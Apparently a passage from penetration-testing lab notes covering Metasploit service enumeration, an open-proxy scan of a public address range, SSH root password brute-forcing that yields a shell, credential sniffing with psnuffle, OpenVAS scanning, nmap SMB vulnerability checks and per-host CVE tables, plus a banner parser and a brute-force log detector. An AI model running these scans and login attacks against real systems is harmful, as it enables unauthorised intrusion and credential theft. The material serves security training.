| In-depth system vulnerability scanning | open ports on all live hosts |
| System vulnerability exploitation | security flaws in any of the exposed network services |
| Web application vulnerability scanning | 10.10.10.129: Apache, Apache Tomcat |
| | 10.10.10.254: Apache, Apache Tomcat |
| Web application vulnerability exploitation | 10.10.10.129: Apache, Apache Tomcat |
| | 10.10.10.254: Apache, Apache Tomcat |

###7. Service scanning and enumeration###

Once the open ports are known, the services running on them are usually examined in more depth; this is commonly called network enumeration.
The Scanner auxiliary modules in msf include many service scanning and enumeration tools, usually named [service_name]_version and [service_name]_login:
	[service_name]_version: sweeps the network for hosts that run a given service and determines the service version
	[service_name]_login: performs password testing against a given service

msf > search name:_version
	Matching Modules
	================
	   Name                                                     Disclosure Date  Rank     Description
	   ----                                                     ---------------  ----     -----------
	   auxiliary/fuzzers/ssh/ssh_version_15                                      normal   SSH 1.5 Version Fuzzer
	   auxiliary/fuzzers/ssh/ssh_version_2                                       normal   SSH 2.0 Version Fuzzer
	   auxiliary/fuzzers/ssh/ssh_version_corrupt                                 normal   SSH Version Corruption
	   auxiliary/gather/ibm_sametime_version                    2013-12-27       normal   IBM Lotus Sametime Version Enumeration
	   auxiliary/scanner/db2/db2_version                                         normal   DB2 Probe Utility
	   auxiliary/scanner/ftp/ftp_version                                         normal   FTP Version Scanner
	   auxiliary/scanner/h323/h323_version                                       normal   H.323 Version Scanner
	   auxiliary/scanner/http/coldfusion_version                                 normal   ColdFusion Version Scanner
	   auxiliary/scanner/http/http_version                                       normal   HTTP Version Detection
	   auxiliary/scanner/http/joomla_version                                     normal   Joomla Version Scanner
	   auxiliary/scanner/http/sap_businessobjects_version_enum                   normal   SAP BusinessObjects Version Detection
	   auxiliary/scanner/http/ssl_version                       2014-10-14       normal   HTTP SSL/TLS Version Detection (POODLE scanner)
	   auxiliary/scanner/http/svn_scanner                                        normal   HTTP Subversion Scanner
	   auxiliary/scanner/imap/imap_version                                       normal   IMAP4 Banner Grabber
	   auxiliary/scanner/ipmi/ipmi_version                                       normal   IPMI Information Discovery
	   auxiliary/scanner/lotus/lotus_domino_version                              normal   Lotus Domino Version
	   auxiliary/scanner/mysql/mysql_version                                     normal   MySQL Server Version Enumeration
	   auxiliary/scanner/oracle/tnslsnr_version                 2009-01-07       normal   Oracle TNS Listener Service Version Query
	   auxiliary/scanner/pop3/pop3_version                                       normal   POP3 Banner Grabber
	   auxiliary/scanner/postgres/postgres_version                               normal   PostgreSQL Version Probe
	   auxiliary/scanner/printer/printer_version_info                            normal   Printer Version Information Scanner
	   auxiliary/scanner/sap/sap_mgmt_con_version                                normal   SAP Management Console Version Detection
	   auxiliary/scanner/scada/digi_addp_version                                 normal   Digi ADDP Information Discovery
	   auxiliary/scanner/scada/digi_realport_version                             normal   Digi RealPort Serial Server Version
	   auxiliary/scanner/scada/modbusdetect                     2011-11-01       normal   Modbus Version Scanner
	   auxiliary/scanner/smb/smb_version                                         normal   SMB Version Detection
	   auxiliary/scanner/smtp/smtp_version                                       normal   SMTP Banner Grabber
	   auxiliary/scanner/snmp/aix_version                                        normal   AIX SNMP Scanner Auxiliary Module
	   auxiliary/scanner/ssh/ssh_version                                         normal   SSH Version Scanner
	   auxiliary/scanner/telnet/lantronix_telnet_version                         normal   Lantronix Telnet Service Banner Detection
	   auxiliary/scanner/telnet/telnet_version                                   normal   Telnet Service Banner Detection
	   auxiliary/scanner/vmware/vmauthd_version                                  normal   VMWare Authentication Daemon Version Scanner
	   auxiliary/scanner/vxworks/wdbrpc_version                                  normal   VxWorks WDB Agent Version Scanner
	   exploit/multi/svn/svnserve_date                          2004-05-19       average  Subversion Date Svnserve
	   exploit/windows/browser/crystal_reports_printcontrol     2010-12-14       normal   Crystal Reports CrystalPrintControl ActiveX ServerResourceVersion Property Overflow
	   exploit/windows/fileformat/digital_music_pad_pls         2010-09-17       normal   Digital Music Pad Version 8.2.3.3.4 Stack Buffer Overflow
	   exploit/windows/fileformat/orbit_download_failed_bof     2008-04-03       normal   Orbit Downloader URL Unicode Conversion Overflow
	   exploit/windows/fileformat/realplayer_ver_attribute_bof  2013-12-20       normal   RealNetworks RealPlayer Version Attribute Buffer Overflow
	   exploit/windows/ftp/filecopa_list_overflow               2006-07-19       average  FileCopa FTP Server Pre 18 Jul Version
	   exploit/windows/scada/iconics_genbroker                  2011-03-21       good     Iconics GENESIS32 Integer Overflow Version 9.21.201.01

1. Common network service scans
	Telnet service scan
		msf > use auxiliary/scanner/telnet/telnet_version 
		msf auxiliary(telnet_version) > set RHOSTS 10.10.10.0/24
		RHOSTS => 10.10.10.0/24
		msf auxiliary(telnet_version) > set THREADS 100
		THREADS => 100
		msf auxiliary(telnet_version) > run
		[*] 10.10.10.254:23 gate.dvssc.com login:                 _       _ _        _     _      ____  \x0a _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ \x0a| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |\x0a| | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/ \x0a|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|\x0a                            |_|                                          \x0a\x0a\x0aWarning: Never expose this VM to an untrusted network!\x0a\x0aContact: msfdev[at]metasploit.com\x0a\x0aLogin with msfadmin/msfadmin to get started\x0a\x0a\x0agate.dvssc.com login:
		[*] Scanned 256 of 256 hosts (100% complete)
		[*] Auxiliary module execution completed
		Result: 10.10.10.254 has the Telnet service open

	SSH service scan
		msf > use auxiliary/scanner/ssh/ssh_version 
		msf auxiliary(ssh_version) > set RHOSTS 10.10.10.0/24
		RHOSTS => 10.10.10.0/24
		msf auxiliary(ssh_version) > set THREADS 100
		THREADS => 100
		msf auxiliary(ssh_version) > run
		[*] 10.10.10.128:22       - SSH server version: SSH-2.0-OpenSSH_7.4p1 Debian-10
		[*] 10.10.10.129:22       - SSH server version: SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu4 ( service.version=5.3p1 openssh.comment=Debian-3ubuntu4 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH os.vendor=Ubuntu os.device=General os.family=Linux os.product=Linux os.version=10.04 service.protocol=ssh fingerprint_db=ssh.banner )
		[*] 10.10.10.254:22       - SSH server version: SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1 ( service.version=4.7p1 openssh.comment=Debian-8ubuntu1 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH os.vendor=Ubuntu os.device=General os.family=Linux os.product=Linux os.version=8.04 service.protocol=ssh fingerprint_db=ssh.banner )
		[*] Auxiliary module execution completed
		Result: 10.10.10.254 and 10.10.10.129 have the SSH service open
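The _version modules above work by reading the banner a service volunteers as soon as a client connects. As an added example (not Metasploit's code), the Python below grabs and parses an SSH identification string as defined in RFC 4253; the local fake server and the banner it sends are constructed to mirror the 10.10.10.129 result above so that the script runs offline.

```python
"""Grab and parse an SSH identification string, as ssh_version does.

Added example for these notes (not Metasploit code). RFC 4253 section 4.2
defines the first line an SSH server sends:
    SSH-protoversion-softwareversion SP comments CR LF
The scan above recorded e.g. "SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu4"; from
that string alone the protocol generation, software and distribution
package revision can be read off for an inventory or patch-level review.
"""
import socket
import threading
from dataclasses import dataclass


@dataclass
class SshBanner:
    protoversion: str   # "2.0" (or "1.99" for servers that also speak SSH-1)
    software: str       # "OpenSSH_5.3p1"
    comments: str       # "Debian-3ubuntu4", often the distro package revision
    product: str        # "OpenSSH"
    version: str        # "5.3p1"


def parse_ssh_banner(line: str) -> SshBanner:
    """Split an identification string into its RFC 4253 fields.

    Raises ValueError for anything that is not an SSH identification string.
    """
    line = line.rstrip("\r\n")
    if not line.startswith("SSH-"):
        raise ValueError(f"not an SSH identification string: {line!r}")
    ident, _, comments = line.partition(" ")
    parts = ident.split("-", 2)            # ["SSH", protoversion, softwareversion]
    if len(parts) != 3 or not parts[1] or not parts[2]:
        raise ValueError(f"malformed identification string: {line!r}")
    # OpenSSH and most servers write product_version; otherwise keep the whole field.
    product, sep, version = parts[2].partition("_")
    if not sep:
        product, version = parts[2], ""
    return SshBanner(parts[1], parts[2], comments, product, version)


def grab_ssh_banner(host: str, port: int = 22, timeout: float = 3.0) -> str:
    """Connect and return the server's identification line.

    RFC 4253 allows a server to send other text lines before the SSH- line,
    so lines are read until one starts with "SSH-" (bounded, so a chatty
    non-SSH service cannot keep the scanner reading forever).
    """
    with socket.create_connection((host, port), timeout=timeout) as sock:
        stream = sock.makefile("rb")
        for _ in range(50):
            raw = stream.readline()
            if not raw:
                break
            line = raw.decode("utf-8", errors="replace")
            if line.startswith("SSH-"):
                return line.rstrip("\r\n")
    raise ValueError(f"{host}:{port} sent no SSH identification string")


def serve_fake_banner(banner: bytes):
    """Start a one-shot loopback listener that sends `banner` and disconnects.

    Returns (host, port). Constructed stand-in for a real sshd so the
    example runs offline.
    """
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)

    def run():
        conn, _ = listener.accept()
        conn.sendall(banner)
        conn.close()
        listener.close()

    threading.Thread(target=run, daemon=True).start()
    return listener.getsockname()


if __name__ == "__main__":
    # Banner constructed to mirror the 10.10.10.129 result recorded above.
    host, port = serve_fake_banner(b"SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu4\r\n")
    print(parse_ssh_banner(grab_ssh_banner(host, port)))
```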

2. Oracle database service enumeration
	msf > use auxiliary/scanner/oracle/tnslsnr_version 
		msf auxiliary(tnslsnr_version) > set RHOSTS 10.10.10.0/24
		RHOSTS => 10.10.10.0/24
		msf auxiliary(tnslsnr_version) > set THREADS 50
		THREADS => 50
		msf auxiliary(tnslsnr_version) > run
		[*] Scanned  50 of 256 hosts (19% complete)
		[+] 10.10.10.130:1521 - 10.10.10.130:1521 Oracle - Version: 32-bit Windows: Version 10.2.0.1.0 - Production
		[*] Scanned 129 of 256 hosts (50% complete)
		[*] Scanned 167 of 256 hosts (65% complete)				
		[*] Scanned 184 of 256 hosts (71% complete)
		[*] Scanned 256 of 256 hosts (100% complete)
		[*] Auxiliary module execution completed
		Result: 10.10.10.130 has port 1521 (Oracle SQL) open
				SQL Server listens on port 1433
				Oracle SQL listens on port 1521
3. Open proxy detection and use
	open_proxy: a convenient way to find the addresses of open (free-to-use) HTTP proxy servers
	msf > use auxiliary/scanner/http/open_proxy 
	msf auxiliary(open_proxy) > show options
	Module options (auxiliary/scanner/http/open_proxy):
	   Name           Current Setting           Required  Description
	   ----           ---------------           --------  -----------
	   CHECKURL       http://www.google.com     yes       The web site to test via alleged web proxy
	   MULTIPORTS     false                     no        Multiple ports will be used: 80, 443, 1080, 3128, 8000, 8080, 8123
	   Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]
	   RHOSTS                                   yes       The target address range or CIDR identifier
	   RPORT          8080                      yes       The target port (TCP)
	   SSL            false                     no        Negotiate SSL/TLS for outgoing connections
	   THREADS        1                         yes       The number of concurrent threads
	   VALIDCODES     200,302                   yes       Valid HTTP code for a successfully request
	   VALIDPATTERN   302 Moved                 yes       Valid pattern match (case-sensitive into the headers and HTML body) for a successfully request
	   VERIFYCONNECT  false                     no        Enable CONNECT HTTP method check
	   VHOST                                    no        HTTP server virtual host
	msf auxiliary(open_proxy) > set SITE www.google.com
	SITE => www.google.com
	msf auxiliary(open_proxy) > set RHOSTS 24.25.24.1-24.25.26.254
	RHOSTS => 24.25.24.1-24.25.26.254
	msf auxiliary(open_proxy) > set MULTIPORTS true
	MULTIPORTS => true
	msf auxiliary(open_proxy) > set THREADS 100
	THREADS => 100
	msf auxiliary(open_proxy) > run
	[*] Scanned 102 of 766 hosts (13% complete)
	[*] Scanned 397 of 766 hosts (51% complete)
	[*] Scanned 766 of 766 hosts (100% complete)
	[*] Auxiliary module execution completed
4. SSH service password guessing and sniffing
	msf > use auxiliary/scanner/ssh/ssh_login
	msf auxiliary(ssh_login) > set RHOSTS 10.10.10.254
	RHOSTS => 10.10.10.254
	msf auxiliary(ssh_login) > set USERNAME root
	USERNAME => root
	msf auxiliary(ssh_login) > set PASS_FILE /root/words.txt
	PASS_FILE => /root/words.txt
	msf auxiliary(ssh_login) > set THREADS 50
	THREADS => 50
	msf auxiliary(ssh_login) > run
	[*] SSH - Starting bruteforce
	[-] SSH - Failed: 'root:123456'
	[-] SSH - Failed: 'root:ubuntu'
	[+] SSH - Success: 'root:toor' 'uid=0(root) gid=0(root) groups=0(root) Linux gate.dvssc.com 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
	[*] Command shell session 1 opened (10.10.10.128:42501 -> 10.10.10.254:22) at 2017-08-29 01:18:09 -0400
	[*] Scanned 1 of 1 hosts (100% complete)
	[*] Auxiliary module execution completed
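The guessing run above, seen from the target's own sshd log, as an added detection example (not from the book or this page): it parses constructed auth.log lines in OpenSSH's syslog format and flags a source that accumulates failed passwords within a short window, recording whether a password login from that source was then accepted. The host name gate and the source address 10.10.10.128 come from the transcript; the log lines, pids and client ports are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd auth.log lines (syslog format written by OpenSSH on
# Debian/Ubuntu). Host name and source address follow the ssh_login transcript;
# timestamps, pids and client ports are made up.
SAMPLE_AUTH_LOG = """\
Aug 29 01:18:01 gate sshd[2311]: Failed password for root from 10.10.10.128 port 42497 ssh2
Aug 29 01:18:02 gate sshd[2313]: Failed password for root from 10.10.10.128 port 42498 ssh2
Aug 29 01:18:03 gate sshd[2315]: Failed password for root from 10.10.10.128 port 42499 ssh2
Aug 29 01:18:05 gate sshd[2317]: Failed password for root from 10.10.10.128 port 42500 ssh2
Aug 29 01:18:09 gate sshd[2319]: Accepted password for root from 10.10.10.128 port 42501 ssh2
Aug 29 01:20:40 gate sshd[2330]: Accepted publickey for msfadmin from 10.10.10.1 port 51022 ssh2
Aug 29 01:21:02 gate sshd[2333]: Failed password for invalid user admin from 10.10.10.2 port 40011 ssh2
Aug 29 01:21:03 gate systemd[1]: Started Session 12 of user msfadmin.
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) (?P<method>\w+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>\S+) port \d+"
)


def parse_line(line, year=2017):
    """Return (timestamp, result, method, user, src) for an sshd login line,
    or None for anything else. Syslog lines carry no year, so it is supplied."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["method"], m["user"], m["src"]


def detect_password_guessing(log_text, threshold=3, window_seconds=60):
    """Flag each source that logs at least `threshold` failed password logins
    within `window_seconds`. For a flagged source, record the user names tried
    and whether a password login from it was accepted afterwards (the case
    that needs an immediate response: a guessed password that worked)."""
    state = defaultdict(lambda: {"times": [], "users": set()})
    findings = {}
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, result, method, user, src = parsed
        if method != "password":
            continue  # key-based logins cannot be guessed this way
        s = state[src]
        if result == "Failed":
            # keep only failures inside the sliding window, then add this one
            s["times"] = [t for t in s["times"] if (ts - t).total_seconds() <= window_seconds]
            s["times"].append(ts)
            s["users"].add(user)
            if len(s["times"]) >= threshold:
                findings[src] = {"failures": len(s["times"]),
                                 "users": sorted(s["users"]),
                                 "accepted_as": None}
        elif src in findings:
            findings[src]["accepted_as"] = user  # success right after a burst of failures
    return findings
```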
5. psnuffle password sniffing
	msf > use auxiliary/sniffer/psnuffle 
	msf auxiliary(psnuffle) > run
	[*] Auxiliary module execution completed

	[*] Loaded protocol FTP from /usr/share/metasploit-framework/data/exploits/psnuffle/ftp.rb...
	[*] Loaded protocol IMAP from /usr/share/metasploit-framework/data/exploits/psnuffle/imap.rb...
	[*] Loaded protocol POP3 from /usr/share/metasploit-framework/data/exploits/psnuffle/pop3.rb...
	msf auxiliary(psnuffle) > [*] Loaded protocol SMB from /usr/share/metasploit-framework/data/exploits/psnuffle/smb.rb...
	[*] Loaded protocol URL from /usr/share/metasploit-framework/data/exploits/psnuffle/url.rb...
	[*] Sniffing traffic.....
6. Using OpenVAS from inside Metasploit
		
	0. Start the openvas service
		root@attacker:~# openvas-start
		
	1. Load the openvas plugin in metasploit
		msf > load openvas 
		[*] Welcome to OpenVAS integration by kost and averagesecurityguy.
		[*] Successfully loaded plugin: OpenVAS
		
	2. Connect to openvas; usage: openvas_connect username password host port ok (the trailing ok accepts the SSL connection)
		msf > openvas_connect admin toor 127.0.0.1 9390 ok 
		[*] Connecting to OpenVAS instance at 127.0.0.1:9390 with username admin...
		[+] OpenVAS list of targets
		ID                                    Name                                          Hosts         Max Hosts  In Use  Comment
		--                                    ----                                          -----         ---------  ------  -------
		5e78a0e1-6569-45d9-8474-d7c83d0ea8ff  test2                                         10.10.10.254  1          0       Metasploitable
		971d579a-b65c-406c-9737-b4d946fb68b1  UUUU                                          10.10.10.254  1          1       Mwtasploitable
	
	3. List the openvas scan configs
		msf > openvas_config_list 
		/usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/openvas-omp-0.0.4/lib/openvas-omp.rb:201:in `sendrecv': Object#timeout is deprecated, use Timeout.timeout instead.
		[+] OpenVAS list of configs
		ID                                    Name
		--                                    ----
		085569ce-73ed-11df-83c3-002264764cea  empty
		2d3f051c-55ba-11e3-bf43-406186ea4fc5  Host Discovery
		698f691e-7489-11df-9d8c-002264764cea  Full and fast ultimate
		708f25c4-7489-11df-8094-002264764cea  Full and very deep
		74db13d6-7489-11df-91b9-002264764cea  Full and very deep ultimate
		8715c877-47a0-438d-98a3-27c7a6ab2196  Discovery
		bbca7412-a950-11e3-9109-406186ea4fc5  System Discovery
		daba56c8-73ec-11df-a475-002264764cea  Full and fast

	4. Create a scan task; usage: openvas_task_create name comment config_id target_id
		msf > openvas_task_create test-scan "Scan of test2 Metasploitable" daba56c8-73ec-11df-a475-002264764cea 5e78a0e1-6569-45d9-8474-d7c83d0ea8ff
		[+] OpenVAS list of tasks
		ID                                    Name                               Comment                                 Status   Progress
		--                                    ----                               -------                                 ------   --------
		1ff1e36e-1d76-4a62-b17b-8eb0d11977ba  UUOO                               OOOOOOOOO                               Done     -1
		b4baa75d-9d51-4393-a8fd-66a0480bda28  test-scan                          Scan of test2 Metasploitable            New      -1
	
	5. Start the scan task; usage: openvas_task_start task_id
		msf > openvas_task_start b4baa75d-9d51-4393-a8fd-66a0480bda28
		[+] OpenVAS list of tasks
		ID                                    Name                               Comment                                 Status     Progress
		--                                    ----                               -------                                 ------     --------
		1ff1e36e-1d76-4a62-b17b-8eb0d11977ba  UUOO                               OOOOOOOOO                               Done       -1
		b4baa75d-9d51-4393-a8fd-66a0480bda28  test-scan                          Scan of test2 Metasploitable            Requested  1
		
	6. List the scan tasks (the scan is running)
		msf > openvas_task_list 
		/usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/openvas-omp-0.0.4/lib/openvas-omp.rb:201:in `sendrecv': Object#timeout is deprecated, use Timeout.timeout instead.
		[+] OpenVAS list of tasks
		ID                                    Name                               Comment                                 Status   Progress
		--                                    ----                               -------                                 ------   --------
		1ff1e36e-1d76-4a62-b17b-8eb0d11977ba  UUOO                               OOOOOOOOO                               Done     -1
		b4baa75d-9d51-4393-a8fd-66a0480bda28  test-scan                          Scan of test2 Metasploitable            Running  1
	
	7. List the scan tasks again (the scan has finished)
		msf > openvas_task_list 
		/usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/openvas-omp-0.0.4/lib/openvas-omp.rb:201:in `sendrecv': Object#timeout is deprecated, use Timeout.timeout instead.
		[+] OpenVAS list of tasks
		ID                                    Name                               Comment                                 Status   Progress
		--                                    ----                               -------                                 ------   --------
		1ff1e36e-1d76-4a62-b17b-8eb0d11977ba  UUOO                               OOOOOOOOO                               Done     -1
		b4baa75d-9d51-4393-a8fd-66a0480bda28  test-scan                          Scan of test2 Metasploitable            Done     -1

	8. After the scan finishes, list the scan reports
		msf > openvas_report_list
		ID                                    Task Name                          Start Time            Stop Time
		--                                    ---------                          ----------            ---------
		752e8852-68f4-4bff-a23c-92767a6c9bd7  test-scan                          2017-08-30T06:12:51Z  2017-08-30T06:13:06Z
		babf1f94-c1ca-4b4e-b678-a0cd355c6a72  UUOO                               2017-08-30T00:42:12Z  2017-08-30T01:06:41Z
		
	9. List the supported report formats
		msf > openvas_format_list 
		/usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/openvas-omp-0.0.4/lib/openvas-omp.rb:201:in `sendrecv': Object#timeout is deprecated, use Timeout.timeout instead.
		[+] OpenVAS list of report formats
		ID                                    Name           Extension  Summary
		--                                    ----           ---------  -------
		5057e5cc-b825-11e4-9d0e-28d24461215b  Anonymous XML  xml        Anonymous version of the raw XML report
		50c9950a-f326-11e4-800c-28d24461215b  Verinice ITG   vna        Greenbone Verinice ITG Report, v1.0.1.
		5ceff8ba-1f62-11e1-ab9f-406186ea4fc5  CPE            csv        Common Product Enumeration CSV table.
		6c248850-1f62-11e1-b082-406186ea4fc5  HTML           html       Single page HTML report.
		77bd6c4a-1f62-11e1-abf0-406186ea4fc5  ITG            csv        German "IT-Grundschutz-Kataloge" report.
		9087b18c-626c-11e3-8892-406186ea4fc5  CSV Hosts      csv        CSV host summary.
		910200ca-dc05-11e1-954f-406186ea4fc5  ARF            xml        Asset Reporting Format v1.0.0.
		9ca6fe72-1f62-11e1-9e7c-406186ea4fc5  NBE            nbe        Legacy OpenVAS report.
		9e5e5deb-879e-4ecc-8be6-a71cd0875cdd  Topology SVG   svg        Network topology SVG image.
		a3810a62-1f62-11e1-9219-406186ea4fc5  TXT            txt        Plain text report.
		a684c02c-b531-11e1-bdc2-406186ea4fc5  LaTeX          tex        LaTeX source file.
		a994b278-1f62-11e1-96ac-406186ea4fc5  XML            xml        Raw XML report.
		c15ad349-bd8d-457a-880a-c7056532ee15  Verinice ISM   vna        Greenbone Verinice ISM Report, v3.0.0.
		c1645568-627a-11e3-a660-406186ea4fc5  CSV Results    csv        CSV result list.
		c402cc3e-b531-11e1-9163-406186ea4fc5  PDF            pdf        Portable Document Format report.

	10. Download a scan report; usage: openvas_report_download report_id format_id path report_name
		msf > openvas_report_download 
		[*] Usage: openvas_report_download <report_id> <format_id> <path> <report_name>
		msf > openvas_report_download 752e8852-68f4-4bff-a23c-92767a6c9bd7 c402cc3e-b531-11e1-9163-406186ea4fc5 /root/reports/ tast2_scan_report.pdf
		/usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/openvas-omp-0.0.4/lib/openvas-omp.rb:201:in `sendrecv': Object#timeout is deprecated, use Timeout.timeout instead.
		[*] Saving report to /root/reports/tast2_scan_report.pdf

7. Searching for vulnerabilities in a specific service

nmap scripts live in /usr/share/nmap/scripts
root@attacker:/usr/share/nmap/scripts# nmap --script=smb-check-vulns 10.10.10.130
Error message: NSE: failed to initialize the script engine:
	/usr/bin/../share/nmap/nse_main.lua:801: 'smb-check-vulns.nse' did not match a category, filename, or directory
This is because the smb-check-vulns.nse script was removed starting with Nmap 6.49beta6.
It was split into six scripts: smb-vuln-conficker, smb-vuln-cve2009-3103, smb-vuln-ms06-025, smb-vuln-ms07-029, smb-vuln-regsvc-dos and smb-vuln-ms08-067.
Pick the script that matches what you need; if you are not sure which one to run, smb-vuln-*.nse selects all of them.

root@attacker:/usr/share/nmap/scripts# nmap --script=smb-vuln-*.nse 10.10.10.130
	Starting Nmap 7.60 ( https://nmap.org ) at 2017-08-30 08:12 EDT
	mass_dns: warning: Unable to open /etc/resolv.conf. Try using --system-dns or specify valid servers with --dns-servers
	mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
	Nmap scan report for service.dvssc.com (10.10.10.130)
	Host is up (0.00022s latency).
	Not shown: 985 closed ports
	PORT     STATE SERVICE
	21/tcp   open  ftp
	80/tcp   open  http
	135/tcp  open  msrpc
	139/tcp  open  netbios-ssn
	445/tcp  open  microsoft-ds
	777/tcp  open  multiling-http
	1025/tcp open  NFS-or-IIS
	1026/tcp open  LSA-or-nterm
	1027/tcp open  IIS
	1031/tcp open  iad2
	1521/tcp open  oracle
	6002/tcp open  X11:2
	7001/tcp open  afs3-callback
	7002/tcp open  afs3-prserver
	8099/tcp open  unknown
	MAC Address: 00:0C:29:DB:51:D2 (VMware)

	Host script results:
	| smb-vuln-cve2009-3103: 
	|   VULNERABLE:
	|   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
	|     State: VULNERABLE
	|     IDs:  CVE:CVE-2009-3103
	|           Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2, 
	|           Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a 
	|           denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE 
	|           PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location, 
	|           aka "SMBv2 Negotiation Vulnerability." 
	|           
	|     Disclosure date: 2009-09-08
	|     References:
	|       http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
	|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
	| smb-vuln-ms08-067: 
	|   VULNERABLE:
	|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
	|     State: VULNERABLE
	|     IDs:  CVE:CVE-2008-4250
	|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, 
	|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary 
	|           code via a crafted RPC request that triggers the overflow during path canonicalization.
	|           
	|     Disclosure date: 2008-10-23
	|     References:
	|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
	|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
	|_smb-vuln-ms10-054: false
	|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
	| smb-vuln-ms17-010: 
	|   VULNERABLE:
	|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
	|     State: VULNERABLE
	|     IDs:  CVE:CVE-2017-0143
	|     Risk factor: HIGH
	|       A critical remote code execution vulnerability exists in Microsoft SMBv1
	|        servers (ms17-010).
	|           
	|     Disclosure date: 2017-03-14
	|     References:
	|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
	|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
	|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
	Nmap done: 1 IP address (1 host up) scanned in 6.78 seconds

###8. Analysis of the vulnerability scan results###

Backend server (10.10.10.130), OS: Windows

| High-risk vulnerability | Reference |
|---|---|
| Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service | CVE-2017-7269 |
| IIS FTP Service RCE and DoS Vulnerability | CVE-2009-3023 |
| Integer Overflow in IPP Service Vulnerability | CVE-2008-1446 |
| IIS Authentication Memory Corruption Vulnerability | CVE-2010-1256 |
| IIS 5.1 and 6.0 WebDAV Authentication Bypass Vulnerability (WebDAV extension in Microsoft Internet Information Services) | CVE-2009-1535 |
| Microsoft Internet Information Services | CVE-2009-4444 |
| IIS Repeated Parameter Request Denial of Service Vulnerability | CVE-2010-1899 |
| Inverse Lookup Log Corruption (ILLC) | CVE-2003-1582 |
| IIS FTP Service DoS Vulnerability | CVE-2009-2521 |

Gateway server (10.10.10.254), OS: Linux

| High-risk vulnerability | Reference |
|---|---|
| ProFTPD Server SQL Injection Vulnerability | CVE-2009-0542 |
| ProFTPD Long Command Handling Security Vulnerability | CVE-2008-4242 |
| PHP < 5.2.13 Multiple Vulnerabilities | CVE-2010-1128 |
| PHP 'sqlite_single_query()' and 'sqlite_array_query()' Arbitrary Code Execution | |
| PHP Multiple Information Disclosure Vulnerabilities | CVE-2010-2190 |
| Heap-based buffer overflow in 'mbstring' extension for PHP | CVE-2008-5557 |
| PHP Multiple Vulnerabilities Dec-09 | CVE-2009-4018 |
| PHP '_gdGetColors()' Buffer Overflow Vulnerability | CVE-2009-3546 |
| http TRACE XSS attack | CVE-2004-2320 |
| PHP Multiple Buffer Overflow Vulnerabilities | CVE-2008-3659 |
| PHP Interruptions and Calltime Arbitrary Code Execution Vulnerability | |
| PHP 'SplObjectStorage' Unserializer Arbitrary Code Execution Vulnerability | CVE-2010-2225 |
| Samba SID Parsing Remote Buffer Overflow Vulnerability | CVE-2010-3069 |
| Samba multiple vulnerabilities | CVE-2009-2813 |
| Samba 'mount.cifs' Utility Local Privilege Escalation Vulnerability | CVE-2009-3297 |
| Samba 'SMB1 Packet Chaining' Unspecified Remote Memory Corruption Vulnerability | CVE-2010-2063 |

Web server (10.10.10.129), OS: Linux

| High-risk vulnerability | Reference |
|---|---|
| Heap-based buffer overflow in the dcerpc_read_ncacn_packet_done function in librpc/rpc/dcerpc_util.c in winbindd in Samba | CVE-2013-4408 |
| Apache Tomcat 6.x before 6.0.44, 7.x before 7.0.55, and 8.x before 8.0.9 does not properly handle cases where an HTTP response occurs before finishing the reading of an entire request body | CVE-2014-0230 |
| Certain AJP protocol connector implementations in Apache Tomcat 7.0.0 through 7.0.20, 6.0.0 through 6.0.33, 5.5.0 through 5.5.33, and possibly other versions allow remote attackers to spoof AJP requests | CVE-2011-3190 |
| An attacker can reach JMX ports | CVE-2016-8735 |
| Stack-based buffer overflow in Samba | CVE-2010-3069 |
